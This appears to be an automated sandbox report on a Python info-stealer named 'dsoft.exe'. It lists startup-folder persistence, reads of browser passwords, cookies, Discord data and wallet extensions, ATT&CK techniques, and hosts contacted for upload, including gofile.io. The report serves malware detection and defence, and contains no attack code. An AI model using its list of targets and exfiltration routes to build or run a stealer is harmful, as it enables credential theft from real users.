Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\dsoft.exe

Code function: 0_2_00007FF7B32EC470 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7B32EC470

Source: C:\Users\user\Desktop\dsoft.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Creal Stealer

Source: Yara match	File source: 00000001.00000003.2534735683.000002948994D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2449803777.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2716449819.000001FA5D4E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2676477196.000001FA5CC7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dsoft.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dsoft.exe PID: 4336, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal communication platform credentials (via file / registry access)

Source: C:\Users\user\Desktop\dsoft.exe	File opened: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	File opened: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	File opened: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	File opened: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File opened: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior

Yara detected Generic Python Stealer

Source: Yara match	File source: 0000000E.00000003.2676477196.000001FA5CC7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dsoft.exe PID: 7128, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: dsoft.exe PID: 7128, type: MEMORYSTR

Remote Access Functionality

Yara detected Creal Stealer

Source: Yara match	File source: 00000001.00000003.2534735683.000002948994D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2449803777.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2716449819.000001FA5D4E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2676477196.000001FA5CC7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dsoft.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dsoft.exe PID: 4336, type: MEMORYSTR

Yara detected Generic Python Stealer

Source: Yara match	File source: 0000000E.00000003.2676477196.000001FA5CC7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dsoft.exe PID: 7128, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	12 Registry Run Keys / Startup Folder	11 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Timestomp	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dsoft.exe	34%	ReversingLabs	Win64.Trojan.PyStealer

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ed25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ed448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_x25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Pythonwin\mfc140u.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\Pythonwin\win32ui.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_cffi_backend.cp310-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\_uuid.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\charset_normalizer\md.cp310-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\pywin32_system32\pythoncom310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\pywin32_system32\pywintypes310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI22482\select.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ebay.com)z$	0%	Avira URL Cloud	safe
https://discord.com)	0%	Avira URL Cloud	safe
https://coinbase.com)	0%	Avira URL Cloud	safe
https://discord.gift/	100%	Avira URL Cloud	malware
https://paypal.com)	0%	Avira URL Cloud	safe
https://youtube.com)	0%	Avira URL Cloud	safe
http://www.dabeaz.com/ply)F	0%	Avira URL Cloud	safe
https://xbox.com)	0%	Avira URL Cloud	safe
https://discord.com)z	0%	Avira URL Cloud	safe
https://tiktok.com)	0%	Avira URL Cloud	safe
https://blog.jaraco.com/skeleton	0%	Avira URL Cloud	safe
https://gmail.com)z	0%	Avira URL Cloud	safe
https://crunchyroll.com)	0%	Avira URL Cloud	safe
https://coinbase.com)z	0%	Avira URL Cloud	safe
https://paypal.com)z	0%	Avira URL Cloud	safe
https://twitch.com)z	0%	Avira URL Cloud	safe
https://ebay.com)	0%	Avira URL Cloud	safe
https://roblox.com)z	0%	Avira URL Cloud	safe
https://hbo.com)z	0%	Avira URL Cloud	safe
https://binance.com)z	0%	Avira URL Cloud	safe
https://pornhub.com)z	0%	Avira URL Cloud	safe
https://telegram.com)z	0%	Avira URL Cloud	safe
https://playstation.com)	0%	Avira URL Cloud	safe
https://netflix.com)	0%	Avira URL Cloud	safe
https://gmail.com)	0%	Avira URL Cloud	safe
https://outlook.com)	0%	Avira URL Cloud	safe
https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral	0%	Avira URL Cloud	safe
https://sellix.io)	0%	Avira URL Cloud	safe
https://github.com)	0%	Avira URL Cloud	safe
https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2	0%	Avira URL Cloud	safe
https://youtube.com)z	0%	Avira URL Cloud	safe
https://binance.com)	0%	Avira URL Cloud	safe
https://spotify.com)	0%	Avira URL Cloud	safe
https://spotify.com)z	0%	Avira URL Cloud	safe
https://setuptools.pypa.io/en/stable/history.html	0%	Avira URL Cloud	safe
https://steam.com)	0%	Avira URL Cloud	safe
https://yahoo.com)z	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
store4.gofile.io	31.14.70.245	true	false	high
discord.com	162.159.138.232	true	false	high
api.ipify.org	104.26.13.205	true	false	high
geolocation-db.com	159.89.102.253	true	false	high
api.gofile.io	45.112.123.126	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.gofile.io/getServer	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/pypa/packagingP	dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/pprint.html#pprin	dsoft.exe, 0000000E.00000003.2686089490.000001FA5C2BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileMEDRI	cmd.exe, 00000007.00000002.2150523746.000002BBEB5F0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.dabeaz.com/ply)F	dsoft.exe, 00000001.00000003.2556979506.0000029488A6C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2566160260.0000029488A6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.gift/	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store4.gofile.io/uploadFileMEDRIr?	cmd.exe, 00000020.00000002.2305206433.000002B69E550000.00000004.00000020.00020000.00000000.sdmp	false		high
https://coinbase.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.shields.io/pypi/pyversions/setuptools.svg	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.com)z	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.shields.io/pypi/v/setuptools.svg	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tiktok.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ebay.com)z$	dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.python.org/library/unittest.html	dsoft.exe, 00000001.00000003.2535420058.0000029488DD9000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535331948.0000029488DCC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2682594110.000001FA5C3B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562652028.00000294861C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2556855822.0000029486189000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2562326330.0000029486191000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542181367.00000294861C2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559071670.000002948618F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=white	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paypal.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pypa/packaging	dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	false		high
https://refspecs.linuxfoundation.org/elf/gabi4	dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565795035.0000029488720000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pypi.org/project/setuptools	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/workflows/tests/badge.svg	dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xbox.com)	dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
